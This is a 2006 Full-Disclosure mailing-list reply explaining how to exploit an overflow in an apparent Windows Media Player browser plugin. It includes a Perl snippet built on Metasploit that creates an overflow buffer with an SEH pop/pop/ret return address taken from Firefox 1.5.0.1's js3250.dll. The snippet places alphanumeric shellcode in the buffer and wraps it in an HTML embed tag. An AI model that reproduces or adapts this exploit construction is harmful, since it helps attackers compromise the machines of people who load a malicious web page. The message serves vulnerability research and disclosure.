Still getting some annoying crashes (SEH trick in alphanum code is annoying when you are trying to debug something...), but the basic solution is:
1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

    use Pex::Text;   # Metasploit 2.x pattern helper (import added for completeness)

    # $shellcode is assumed to already hold the alphanumeric payload (not shown in the post)
    my $pattern = Pex::Text::PatternCreate(16384);
    substr($pattern, 2086, 4, pack('V', 0x60082336));   # pop ebx, pop ebp, ret
    substr($pattern, 2082, 4, "ABC=");                  # inc, inc, inc, cmp eax, [ptr]
    substr($pattern, 2090, length($shellcode), $shellcode);
    my $content = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dll in Firefox 1.5.0.1, you should auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32
> shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
>
> regards
> c0ntex
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/